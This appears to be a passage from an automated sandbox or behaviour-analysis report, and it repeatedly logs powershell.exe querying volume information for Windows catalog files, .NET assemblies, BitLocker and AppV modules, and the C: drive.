                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
